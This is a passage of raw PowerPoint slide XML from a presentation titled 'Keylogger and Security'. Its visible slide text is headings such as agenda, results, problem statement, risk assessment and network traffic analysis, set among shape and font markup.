                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Behavioural modelling</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="26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176" name="曲线"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5084627" y="4726929"/>
            <a:ext cx="1012054"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15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="2489BC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4386056" y="5232956"/>
            <a:ext cx="2409193" cy="971484"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4433481" y="5280379"/>
            <a:ext cx="2314345" cy="876636"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66040" tIns="66040" rIns="66040" bIns="66040" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="1155700">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Risk assessment</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="26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179" name="曲线"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9863928">
            <a:off x="3988722" y="4144576"/>
            <a:ext cx="651474"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15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="2489BC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2354912" y="3976216"/>
            <a:ext cx="1645810" cy="971484"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2402336" y="4023640"/>
            <a:ext cx="1550963" cy="876636"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="48260" tIns="48260" rIns="48260" bIns="48260" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="844550">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Network traffic analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="19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182" name="曲线"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12528216">
            <a:off x="4074285" y="3168238"/>
            <a:ext cx="777557" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:gdLst>
              <a:gd name="T1" fmla="*/ 0 w 21600"/>
              <a:gd name="T2" fmla="*/ 0 h 21600"/>
              <a:gd name="T3" fmla="*/ 21600 w 21600"/>
              <a:gd name="T4" fmla="*/ 0 h 21600"/>
            </a:gdLst>
            <a:rect l="T1" t="T2" r="T3" b="T4"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="2489BC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2475157" y="2042325"/>
            <a:ext cx="1647229" cy="971484"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2522580" y="2089749"/>
            <a:ext cx="1552381" cy="876636"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66040" tIns="66040" rIns="66040" bIns="66040" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="1155700">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Scenario modelling</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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57804275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90" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1666874" y="457200"/>
            <a:ext cx="2437130" cy="758190"/>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000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-40" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-30" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-405" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>TS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19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192" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1447800" y="2439687"/>
            <a:ext cx="6396191"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just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0"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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="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0422370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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7448612" y="0"/>
            <a:ext cx="4743795" cy="6858466"/>
            <a:chOff x="7448612" y="0"/>
            <a:chExt cx="4743795" cy="6858466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40"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4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2"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43"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4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45"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4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47"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4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5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54" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="911586" y="823044"/>
            <a:ext cx="5800851"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0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="5" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>PROJECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-85" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>TITLE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="466725" y="3039171"/>
            <a:ext cx="9286875" cy="677108"/>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l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Arial" pitchFamily="0" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5981383"/>
            <a:ext cx="551167"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楷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华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="614082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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7448612" y="0"/>
            <a:ext cx="4743795" cy="6858466"/>
            <a:chOff x="7448612" y="0"/>
            <a:chExt cx="4743795" cy="6858466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7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8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84" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10687050" y="6134100"/>
            <a:ext cx="247649" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="-111062" y="655487"/>
            <a:ext cx="10018713" cy="613410"/>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000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>DA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5974763"/>
            <a:ext cx="55116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3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="223837" y="2250936"/>
            <a:ext cx="9657556" cy="327599"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="30ADEC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="706713" y="2059056"/>
            <a:ext cx="6760289" cy="383759"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="725448" y="2077790"/>
            <a:ext cx="6722821" cy="346291"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="255523" tIns="0" rIns="255523" bIns="0" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" defTabSz="577850">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Problem statement</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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90" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="223837" y="2840615"/>
            <a:ext cx="9657556" cy="327600"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="30ADEC"/>
